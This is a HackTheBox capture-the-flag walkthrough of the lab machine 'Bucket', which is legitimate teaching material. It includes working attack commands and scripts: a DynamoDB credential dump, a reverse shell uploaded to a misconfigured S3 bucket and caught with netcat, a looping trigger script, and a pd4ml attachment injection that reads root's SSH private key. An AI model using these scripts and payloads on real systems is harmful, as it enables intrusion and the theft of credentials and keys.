Bucket HackTheBox WalkThrough
This is Bucket HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Bucket HackTheBox
machine. Before starting let us know something about this machine. It is a Linux
box with IP address 10.10.10.212
and difficulty Medium
assigned by its maker.
First of all connect your PC with HackTheBox VPN
and make sure your connectivity with Bucket machine by pinging its IP 10.10.10.212
. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning
gives us an idea how we have to proceed further. Like, it helps in banner grabbing
the services running over different ports and sometimes it helps in vulnerability assessment
also. I have used nmap
for this task and the result is given below:-
Scanning
$ sudo nmap -sC -sV -oN bucket.nmap 10.10.10.212
Nmap
revealed port number 22 & 80 as open. OpenSSH
is running on port 22
and Apache2
webserver is running on port 80
. Since apache2 is running on port 80 so we should have some website running over URL http://10.10.10.212. After going to this URL found redirection to http://bucket.htb. So, before proceeding for further enumeration we have to add bucket.htb
pointing to IP 10.10.10.212 in our hosts
file which is located at directory /etc/
. Added this record in my hosts file.
Host File After Modification
$ cat /etc/hosts
Ongoing to http://bucket.htb found Bucket Advertising Platform heading and an email address [email protected]
. There is no use of email here because we don’t have port 25
, 110
and 143
open.
Tried to check the page-source
of this page and got a new subdomain s3.bucket.htb
. So before going further added this subdomain to my hosts
file.
Host File after Modification
$ cat /etc/hosts
After going to URL http://s3.bucket.htb found {Status: running}
. It appears that something is running. Since it is S3
and also a hint to bucket so it must be AWS
(Amazon Web Services) S3 Bucket
. Although we come to know that it is using S3 Bucket but we don’t have anything to enumerate on so nothing left accept directory bruteforcing
and fuzzing
.
Directory Bruteforcing
$ sudo dirsearch -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://s3.bucket.htb/ -t 50 -e all | tee raft-medium.out
Directory bruteforcing found a folder shell
. After going to this folder at URL http://s3.bucket.htb/shell/ found DynamoDB JavaScript Shell
. After some googling found a way by which we can enumerate content of table users
from this Shell
. Check this link at StackOverflow. Simply put the following code into the editor
and click on run to execute the code. You will get details of all the items inside the table users
.
var dynamodb = new AWS.DynamoDB({region: 'us-east-1',endpoint: "http://s3.bucket.htb"});var tableName = "users";var params = {TableName: tableName,Select: "ALL_ATTRIBUTES"};function doScan(response) {if (response.error) ppJson(response.error); // an error occurredelse { ppJson(response.data); // successful response // More data. Keep calling scan. if ('LastEvaluatedKey' in response.data) { response.request.params.ExclusiveStartKey = response.data.LastEvaluatedKey; dynamodb.scan(response.request.params) .on('complete', doScan) .send(); }}}console.log("Starting a Scan of the table");dynamodb.scan(params).on('complete', doScan).send();
From the above output we have found credentials. Mgmt
: Management@#1@#
, Cloudadm
: Welcome123!
, Sysadm
: n2vM-<_K_Q:.Aa2
Didn’t know which is right creds for our SSH. Tried to SSH with each of them one by one and even tried to test for all the combinations for SSH using hydra
(an online brute forcer) but no any valid SSH credential found. Here our enumerated credentials are useless till now. Anyway, added this credentials to my cherry tree notes
, may be it will be useful at some other point in further enumeration.
After some further enumeration found a way by which we can enumerate all the webserver and its files inside the bucket using awscli
aws command line tool. To use awscli
tool we have to first configure it with a valid AWS credentials. The required credentials are AWS Access Key ID
, AWS Secret Access Key
, Default region name
& Default output format
( to install awscli tool use $sudo apt install awscli
). Here, the aws S3 bucket is misconfigured and anyone with any fake credential can access the webserver running on this S3 bucket.
Using fake credential
I was also able to access the webserver running in this bucket. Even I could upload a reverse shell onto this webserver and could execute the reverse shell to get connection back to my machine.
To get reverse shell do the following things.
1. Configure the awscli for first use using fake credential. For more info check this article at amazon.
Accessing AWS Bucket Through Aws CLI
$ aws configure
AWS Access Key ID: AKIAI44QH8DHBEXAMPLE
AWS Secret Access Key: je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY
Default region name: us-east-1
Default output format: text
2. List the content of S3 bucket at http://s3.bucket.htb
$ aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request
Adserver webserver is running in the bucket at s3.bucket.htb.
3. List the content in the adserver bucket.
$ aws s3 ls --recursive --human-readable s3://adserver --endpoint-url http://s3.bucket.htb/
4. Copy your php-reverse-shell script in the image folder using cp
command of aws [don’t forget to change the IP address with your tun0 IP in php-reverse-shell script. The php shell can be found in your Kali OS at directory /usr/share/webshells/php/
].
$ aws s3 cp ~/HTB/Boxes/Bucket/shell.php s3://adserver/images/shell.php --endpoint-url http://s3.bucket.htb/
5. List the file of images folder to confirm that our reverse shell is uploaded in the adserver bucket or not.
$ aws s3 ls s3://adserver/images/ --endpoint-url http://s3.bucket.htb/
6. Start netcat listener on your kali machine.
$ nc -nvlp 1234
7. Execute the Shell
$ curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell.php
There is probably a cron job that delete the shell as soon as we upload it. So I have created a script that do this job very fast. So you can get shell using the below script.
Note: You may require to run this script 2 to 3 times to get shell. Before running this script start your netcat listener on the specified port which you have mentioned in your shell script.
#!/bin/bashexport AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLEexport AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEYecho "List Files."aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver## Copying file from local computer to Bucketaws --endpoint-url http://s3.bucket.htb/ s3 cp shell.php s3://adserver/images/shell.phpecho "Checking if file is uploaded"aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver# Checking if file exists on web serverecho "Checking on s3.bucket"curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell.phpresp=404# Executing the shell multiple time until get response code 200while [[ $resp -eq 404 ]]; do resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null http://bucket.htb/images/shell.php) echo $resp sleep 0.1;done
$ bash exploit.sh
We have got user shell as user www-data
. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
$ ^Z
# CTRL+Z To background the shell
$ stty raw -echo
$ fg
# Plus two times enter to foreground the shell
$ stty rows 38 columns 116
We have three credentials enumerated earlier. Let us try to switch to user roy
by using them one by one, roy
: n2vM-<_K_Q:.Aa2
is the valid creds. So let us switch to roy. This is also a valid SSH credential. In case you lose your shell then use this credential to get back into your SSH shell.
Switching to User Roy
$ su roy
Password: n2vM-<_K_Q:.Aa2
$ whoami
Capture User Flag
$ cd ~
$ cat user.txt
Privilege Escalation
To escalate privilege to root we have to first find a privilege escalation vector using which we can escalate privilege. For this I ran linpeas.sh
(a post exploitation enumeration script) on Bucket machine. It finds information of all the potential PrivEsc Vectors that can be used to escalate privilege to root.
Finding PrivEsc Vector
Linpeas suspected directory /var/www/bucket-app/aws/
have something suspicious
that can be used to escalate privilege. Didn’t know exactly why linpeas is suspecting it to be our potential PrivEsc vector. Let us check it manually and confirm whether we would get root or not using this.
index.php
file inside directory /var/www/bucket-app/
gave some information about a table alerts
and some internal ports 4566
as an endpoint. Since bucket-app
is placed inside public folder and apache2 is running there may be chance of internal webserver running on this port. We will confirm it by using $netstat
command.
$ netstat -punta
revealed some unique ports 4566
& 8000
are listening locally.
To access the services running over these ports we have to port forward these services to our local machine so that we can access them in our web browser. We have SSH credential of user roy
which is roy
: n2vM-<_K_Q:.Aa2
, so we can Local Port Forward
to our local machine to access these services. Let us perform local port forwarding.
Performing Local Port Forwarding
$ ssh -L 8000:127.0.0.1:8000 -L 4566:127.0.0.1:4566 [email protected]
~n2vM-<_K_Q:.Aa2
$ ss -lnpt
# Check for listening port on your local machine
We have successfully forwarded the port to our Kali machine as can be confirmed by $ss –lnpt
command on our Kali machine. Now we can check the services running on port 8000
and 4566
in our web browser by visiting the URL http://127.0.0.1:8000/ & http://127.0.0.1:4566 .
Under construction is shown at the URL http://127.0.0.1:8000.
Running status
is shown at URL http://127.0.0.1:4566 . Let us again check the file index.php
at /var/www/bucket-app/
for more information.
According to this file it is making POST request
after accepting some data inside the table alerts
. This table also requests some additional values like Ransomeware
, get_alerts()
and file
in Post Data
. We will exploit this feature to get private SSH key
of root user. For more info about how this page is functioning you can check this article.
So, to exploit this feature and to get root user’s private key I did the following things.
1. Created a new DynamoDB
table alerts
.
2. Inserted the values as requested along with our payload in the table alerts.
3. At last made POST
requests with some additional data as requested.
I have created a script to perform this job. Just copy the script in a file and save it by extension .sh
and execute
it.
#!/bin/bashecho "Creating New Table"echo "======================================"# Creating New Table alertsaws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566echo "======================================"echo "Writing Data to alerts and putting in the file attacked.txt"# Writing Data to table alertsaws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566echo "======================================"echo "Making Post Requests"# Making Post Request with data "action=get_alerts"curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/index.phpecho "Done"echo "Go to http://127.0.0.1:8000/files/ and download the attachment"
$ bash command.sh
Let us go to URL http://127.0.0.1/files/result.pdf to download the attachment by clicking on the pin
icon.
The attachment is id_rsa
key of root user.
$ cat ~/Downloads/id_rsa
Let us use this SSH private key
to login as root to bucket machine.
Getting Root Shell
$ cp ~/Downloads/id_rsa .
$ chmod 400 id_rsa
$ ssh -i id_rsa [email protected]
# whoami && id
We are root now let us capture root flag.
Capture Root Flag
#cat root.txt
This was how I rooted to the Bucket HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. For any query and suggestion about the writeup feel free to write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/ .